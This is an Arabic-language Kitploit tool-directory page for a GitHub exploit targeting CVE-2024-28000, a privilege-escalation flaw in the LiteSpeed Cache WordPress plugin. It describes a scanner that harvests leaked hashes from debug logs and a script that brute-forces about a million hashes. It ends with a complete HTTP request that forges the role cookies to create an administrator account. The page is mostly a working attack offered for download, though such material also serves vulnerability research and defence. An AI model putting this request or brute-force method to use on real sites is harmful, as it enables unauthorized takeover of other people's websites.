Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ssssuperx/cve-2024-28000
تصعيد الامتيازاتهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويب
GitHubssssuperx/cve-2024-28000

CVE-2024-28000

CVE-2024-28000 LiteSpeed Cache تصعيد الامتياز مسح واستغلال

عرض المستودع
12منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

LiteSpeed Cache تصعيد الامتياز Exp

CVE-2024-28000_Scan.py

  • يقوم هذا البرنامج النصي أولاً بتحديد الإصدار لمعرفة ما إذا كان إصدارًا ضعيفًا، ثم يحاول تأكيد وجود ملف السجل. إذا كان موجودًا، فسيحاول إرسال حزمة ثم طلب ملف السجل مرة أخرى لمحاولة العثور على تسرب الهاش. إذا تم تمكين التصحيح في LiteSpeed، فقد يتم تسريب الهاش الصحيح.
root@kitploit:~
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808

مثال:

root@kitploit:~
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init

إذا تم تمكين التصحيح في LiteSpeed، فقد ترى سجلاً مشابهًا لما ورد أعلاه، حيث يمثل pkHrfD الهاش الصحيح.

CVE-2024-28000_Exploit.py

  • بعد الاختبار، تم العثور على اختلاف بين الهاش الذي تم إنشاؤه بواسطة Python و PHP، لذا لا يمكن محاكاة قائمة الهاش باستخدام Python. ملف Hash_list.txt يحتوي على 1,000,000 هاش تم إنشاؤها بواسطة PHP، لذا من الناحية النظرية، يمكن الوصول إلى الهاش الصحيح بعد 1,000,000 محاولة كحد أقصى.
root@kitploit:~
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
  • المعامل -d هو قائمة الهاش، و -u هو عنوان URL، و -t هو عدد الخيوط. لا يُنصح بعدد خيوط مرتفع جدًا.

اختبار

  • في اختبار ساحة التدريب، كان من الممكن اجتياز الهاش بنجاح، وبعد إعادة التثبيت خمس مرات، تم التأكد من أن الهاش ضمن قائمة الهاش المولدة. ومع ذلك، تشير عدة جوانب إلى أن معدل النجاح في الاستغلال العملي منخفض.
  • بعد العثور على الهاش الصحيح بنجاح، يمكن استخدام الحزمة التالية لإضافة مستخدم مسؤول:
root@kitploit:~
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=صحيحHash; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "[email protected]", "roles": ["administrator"]}
تنزيل الأداة